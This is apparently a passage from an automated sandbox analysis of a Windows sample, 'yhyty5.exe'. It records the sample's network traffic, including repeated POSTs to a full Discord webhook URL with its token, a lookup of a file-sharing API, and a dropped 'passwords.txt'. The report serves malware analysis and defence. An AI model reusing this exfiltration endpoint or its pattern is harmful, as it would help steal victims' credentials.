                x-msedge-ref: Ref A: 398BD1E2FEF9496F97F0C6F1B87EBA3B Ref B: LON04EDGE0717 Ref C: 2024-05-05T17:28:41Z
                date: Sun, 05 May 2024 17:28:40 GMT
              • flag-nl
                GET
                https://www.bing.com/aes/c.gif?RG=5f7a08af55e54dcdbb0927441536a406&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240505T172733Z&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644
                Remote address:
                23.62.61.194:443
                Request
                GET /aes/c.gif?RG=5f7a08af55e54dcdbb0927441536a406&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240505T172733Z&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644 HTTP/2.0
                host: www.bing.com
                accept-encoding: gzip, deflate
                user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                cookie: MUID=2D0F2031F60E6E140AF23447F7296FFE
                Response
                HTTP/2.0 200
                cache-control: private,no-store
                pragma: no-cache
                vary: Origin
                p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
                accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                x-msedge-ref: Ref A: F550CFFD186342AE823EC73FCF96B5BC Ref B: DUS30EDGE0713 Ref C: 2024-05-05T17:28:41Z
                content-length: 0
                date: Sun, 05 May 2024 17:28:41 GMT
                set-cookie: _EDGE_S=SID=165254AF97566138146C40D996FC605F; path=/; httponly; domain=bing.com
                set-cookie: MUIDB=2D0F2031F60E6E140AF23447F7296FFE; path=/; httponly; expires=Fri, 30-May-2025 17:28:41 GMT
                alt-svc: h3=":443"; ma=93600
                x-cdn-traceid: 0.be3d3e17.1714930121.d2d7c4
              • flag-us
                DNS
                237.197.79.204.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                237.197.79.204.in-addr.arpa
                IN PTR
                Response
              • flag-nl
                GET
                https://www.bing.com/th?id=OADD2.10239338877209_1W0BYALNC7PUDJ3J3&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90
                Remote address:
                23.62.61.194:443
                Request
                GET /th?id=OADD2.10239338877209_1W0BYALNC7PUDJ3J3&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/2.0
                host: www.bing.com
                accept: */*
                cookie: MUID=2D0F2031F60E6E140AF23447F7296FFE; _EDGE_S=SID=165254AF97566138146C40D996FC605F; MSPTC=KuA8Y97t_HnAMpU4D1AkOM1nkERHn4FGM5aMx7OrbiQ; MUIDB=2D0F2031F60E6E140AF23447F7296FFE
                accept-encoding: gzip, deflate, br
                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                Response
                HTTP/2.0 200
                cache-control: public, max-age=2592000
                content-type: image/png
                access-control-allow-origin: *
                access-control-allow-headers: *
                access-control-allow-methods: GET, POST, OPTIONS
                timing-allow-origin: *
                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                content-length: 457
                date: Sun, 05 May 2024 17:28:41 GMT
                alt-svc: h3=":443"; ma=93600
                x-cdn-traceid: 0.be3d3e17.1714930121.d2d9fa
              • flag-us
                DNS
                194.61.62.23.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                194.61.62.23.in-addr.arpa
                IN PTR
                Response
                194.61.62.23.in-addr.arpa
                IN PTR
                a23-62-61-194deploystaticakamaitechnologiescom
              • flag-us
                DNS
                194.61.62.23.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                194.61.62.23.in-addr.arpa
                IN PTR
              • flag-us
                DNS
                77.239.69.13.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                77.239.69.13.in-addr.arpa
                IN PTR
                Response
              • 162.159.136.232:443
                https://discord.com/api/webhooks/1124017264665055262/UHIARdZJzjmrMMVi_b96a2VFPcjI96g9KmvGt7UzNyIjR9i6IDaVO-YTwYT1HBwwqvna
                tls, http
                yhyty5.exe
                1.4kB
                 5.0kB
                 11
                12

                HTTP Request

                POST https://discord.com/api/webhooks/1124017264665055262/UHIARdZJzjmrMMVi_b96a2VFPcjI96g9KmvGt7UzNyIjR9i6IDaVO-YTwYT1HBwwqvna

                HTTP Response

                404
              • 162.159.136.232:443
                https://discord.com/api/webhooks/1124017264665055262/UHIARdZJzjmrMMVi_b96a2VFPcjI96g9KmvGt7UzNyIjR9i6IDaVO-YTwYT1HBwwqvna
                tls, http
                yhyty5.exe
                1.4kB
                 2.3kB
                 9
                10

                HTTP Request

                POST https://discord.com/api/webhooks/1124017264665055262/UHIARdZJzjmrMMVi_b96a2VFPcjI96g9KmvGt7UzNyIjR9i6IDaVO-YTwYT1HBwwqvna

                HTTP Response

                404
              • 162.159.136.232:443
                https://discord.com/api/webhooks/1124017264665055262/UHIARdZJzjmrMMVi_b96a2VFPcjI96g9KmvGt7UzNyIjR9i6IDaVO-YTwYT1HBwwqvna
                tls, http
                yhyty5.exe
                87.5kB
                 3.5kB
                 71
                40

                HTTP Request

                POST https://discord.com/api/webhooks/1124017264665055262/UHIARdZJzjmrMMVi_b96a2VFPcjI96g9KmvGt7UzNyIjR9i6IDaVO-YTwYT1HBwwqvna

                HTTP Response

                404
              • 162.159.136.232:443
                https://discord.com/api/webhooks/1124017264665055262/UHIARdZJzjmrMMVi_b96a2VFPcjI96g9KmvGt7UzNyIjR9i6IDaVO-YTwYT1HBwwqvna
                tls, http
                yhyty5.exe
                2.8kB
                 2.2kB
                 8
                8

                HTTP Request

                POST https://discord.com/api/webhooks/1124017264665055262/UHIARdZJzjmrMMVi_b96a2VFPcjI96g9KmvGt7UzNyIjR9i6IDaVO-YTwYT1HBwwqvna

                HTTP Response

                404
              • 204.79.197.200:443
                tse1.mm.bing.net
                tls, http2
                1.2kB
                 8.1kB
                 16
                14
              • 204.79.197.200:443
                https://tse1.mm.bing.net/th?id=OADD2.10239340783932_1JCHO8JLBZ4TPAX49&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
                tls, http2
                76.4kB
                 2.2MB
                 1594
                1592

                HTTP Request

                GET https://tse1.mm.bing.net/th?id=OADD2.10239351692215_1UJ4FAL91XLA7HB15&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

                HTTP Request

                GET https://tse1.mm.bing.net/th?id=OADD2.10239340783933_1QOIM48UV8MGOV4SU&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

                HTTP Request

                GET https://tse1.mm.bing.net/th?id=OADD2.10239351692210_1AKNUXTAY2T0XUMCR&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

                HTTP Request

                GET https://tse1.mm.bing.net/th?id=OADD2.10239340783932_1JCHO8JLBZ4TPAX49&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

                HTTP Response

                200

                HTTP Response

                200

                HTTP Response

                200

                HTTP Response

                200
              • 204.79.197.200:443
                tse1.mm.bing.net
                tls, http2
                1.2kB
                 8.1kB
                 16
                14
              • 204.79.197.200:443
                tse1.mm.bing.net
                tls, http2
                1.2kB
                 8.1kB
                 16
                14
              • 204.79.197.237:443
                https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8JGopjgBKI_AlLsA_m6_v3DVUCUzzjikhhGNC_0pOdJuzFZ3_emrOP9JHyUyFbDaJFO6X8PG_R3kdsCi5zfuL5vdYiCxME1FG-CQeOMvlu5A1nhQkhVdGawfapmeCk-CYbSaGXBEb8X6SvNPjCUAptPosCAUyeiQyFxJFI29R_BHFRV5v%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D01f67c91b8671d428aba1aba1eb47290&TIME=20240505T172733Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4
                tls, http2
                2.5kB
                 9.0kB
                 20
                17

                HTTP Request

                GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8JGopjgBKI_AlLsA_m6_v3DVUCUzzjikhhGNC_0pOdJuzFZ3_emrOP9JHyUyFbDaJFO6X8PG_R3kdsCi5zfuL5vdYiCxME1FG-CQeOMvlu5A1nhQkhVdGawfapmeCk-CYbSaGXBEb8X6SvNPjCUAptPosCAUyeiQyFxJFI29R_BHFRV5v%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D01f67c91b8671d428aba1aba1eb47290&TIME=20240505T172733Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4

                HTTP Response

                204

                HTTP Request

                GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8JGopjgBKI_AlLsA_m6_v3DVUCUzzjikhhGNC_0pOdJuzFZ3_emrOP9JHyUyFbDaJFO6X8PG_R3kdsCi5zfuL5vdYiCxME1FG-CQeOMvlu5A1nhQkhVdGawfapmeCk-CYbSaGXBEb8X6SvNPjCUAptPosCAUyeiQyFxJFI29R_BHFRV5v%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D01f67c91b8671d428aba1aba1eb47290&TIME=20240505T172733Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644&muid=3EBA0D95A4930C635584F13F751694E4

                HTTP Response

                204
              • 23.62.61.194:443
                https://www.bing.com/aes/c.gif?RG=5f7a08af55e54dcdbb0927441536a406&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240505T172733Z&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644
                tls, http2
                1.5kB
                 5.4kB
                 17
                12

                HTTP Request

                GET https://www.bing.com/aes/c.gif?RG=5f7a08af55e54dcdbb0927441536a406&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240505T172733Z&adUnitId=11730597&localId=w:3EBA0D95-A493-0C63-5584-F13F751694E4&deviceId=6966564702259644

                HTTP Response

                200
              • 23.62.61.194:443
                https://www.bing.com/th?id=OADD2.10239338877209_1W0BYALNC7PUDJ3J3&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90
                tls, http2
                1.6kB
                 5.7kB
                 16
                11

                HTTP Request

                GET https://www.bing.com/th?id=OADD2.10239338877209_1W0BYALNC7PUDJ3J3&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90

                HTTP Response

                200
              • 8.8.8.8:53
                228.249.119.40.in-addr.arpa
                dns
                73 B
                 159 B
                 1
                1

                DNS Request

                228.249.119.40.in-addr.arpa

              • 8.8.8.8:53
                172.210.232.199.in-addr.arpa
                dns
                74 B
                 128 B
                 1
                1

                DNS Request

                172.210.232.199.in-addr.arpa

              • 8.8.8.8:53
                api.anonfiles.com
                dns
                yhyty5.exe
                63 B
                 133 B
                 1
                1

                DNS Request

                api.anonfiles.com

              • 8.8.8.8:53
                discord.com
                dns
                yhyty5.exe
                57 B
                 137 B
                 1
                1

                DNS Request

                discord.com

                DNS Response

                162.159.136.232
                162.159.137.232
                162.159.128.233
                162.159.135.232
                162.159.138.232

              • 8.8.8.8:53
                69.31.126.40.in-addr.arpa
                dns
                71 B
                 157 B
                 1
                1

                DNS Request

                69.31.126.40.in-addr.arpa

              • 8.8.8.8:53
                95.221.229.192.in-addr.arpa
                dns
                73 B
                 144 B
                 1
                1

                DNS Request

                95.221.229.192.in-addr.arpa

              • 8.8.8.8:53
                232.136.159.162.in-addr.arpa
                dns
                74 B
                 136 B
                 1
                1

                DNS Request

                232.136.159.162.in-addr.arpa

              • 8.8.8.8:53
                86.23.85.13.in-addr.arpa
                dns
                70 B
                 144 B
                 1
                1

                DNS Request

                86.23.85.13.in-addr.arpa

              • 8.8.8.8:53
                171.39.242.20.in-addr.arpa
                dns
                72 B
                 158 B
                 1
                1

                DNS Request

                171.39.242.20.in-addr.arpa

              • 8.8.8.8:53
                17.14.97.104.in-addr.arpa
                dns
                71 B
                 135 B
                 1
                1

                DNS Request

                17.14.97.104.in-addr.arpa

              • 8.8.8.8:53
                0.205.248.87.in-addr.arpa
                dns
                71 B
                 116 B
                 1
                1

                DNS Request

                0.205.248.87.in-addr.arpa

              • 8.8.8.8:53
                26.35.223.20.in-addr.arpa
                dns
                71 B
                 157 B
                 1
                1

                DNS Request

                26.35.223.20.in-addr.arpa

              • 8.8.8.8:53
                tse1.mm.bing.net
                dns
                62 B
                 173 B
                 1
                1

                DNS Request

                tse1.mm.bing.net

                DNS Response

                204.79.197.200
                13.107.21.200

              • 8.8.8.8:53
                48.229.111.52.in-addr.arpa
                dns
                72 B
                 158 B
                 1
                1

                DNS Request

                48.229.111.52.in-addr.arpa

              • 8.8.8.8:53
                g.bing.com
                dns
                56 B
                 151 B
                 1
                1

                DNS Request

                g.bing.com

                DNS Response

                204.79.197.237
                13.107.21.237

              • 8.8.8.8:53
                237.197.79.204.in-addr.arpa
                dns
                73 B
                 143 B
                 1
                1

                DNS Request

                237.197.79.204.in-addr.arpa

              • 8.8.8.8:53
                194.61.62.23.in-addr.arpa
                dns
                142 B
                 135 B
                 2
                1

                DNS Request

                194.61.62.23.in-addr.arpa

                DNS Request

                194.61.62.23.in-addr.arpa

              • 8.8.8.8:53
                77.239.69.13.in-addr.arpa
                dns
                71 B
                 145 B
                 1
                1

                DNS Request

                77.239.69.13.in-addr.arpa

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\passwords.txt
                Filesize

                1B

                MD5

                68b329da9893e34099c7d8ad5cb9c940

                SHA1

                adc83b19e793491b1c6ea0fd8b46cd9f32e592fc

                SHA256

                01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b

                SHA512

                be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

                Download Submit

              • memory/2140-0-0x0000000000250000-0x0000000000266000-memory.dmp

                Filesize

                88KB

                Download

              • memory/2140-1-0x00007FFB21EF3000-0x00007FFB21EF5000-memory.dmp

                Filesize

                8KB

                Download

              • memory/2140-3-0x000000001B2D0000-0x000000001B2EA000-memory.dmp

                Filesize

                104KB

                Download

              • memory/2140-2-0x00000000023B0000-0x00000000023BA000-memory.dmp

                Filesize

                40KB

                Download

              • memory/2140-5-0x00007FFB21EF0000-0x00007FFB229B1000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/2140-24-0x000000001C250000-0x000000001C262000-memory.dmp

                Filesize

                72KB

                Download

              • memory/2140-25-0x000000001C3C0000-0x000000001C3FC000-memory.dmp

                Filesize

                240KB

                Download

              • memory/2140-27-0x00007FFB21EF0000-0x00007FFB229B1000-memory.dmp

                Filesize

                10.8MB

                Download

              We care about your privacy.

              This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.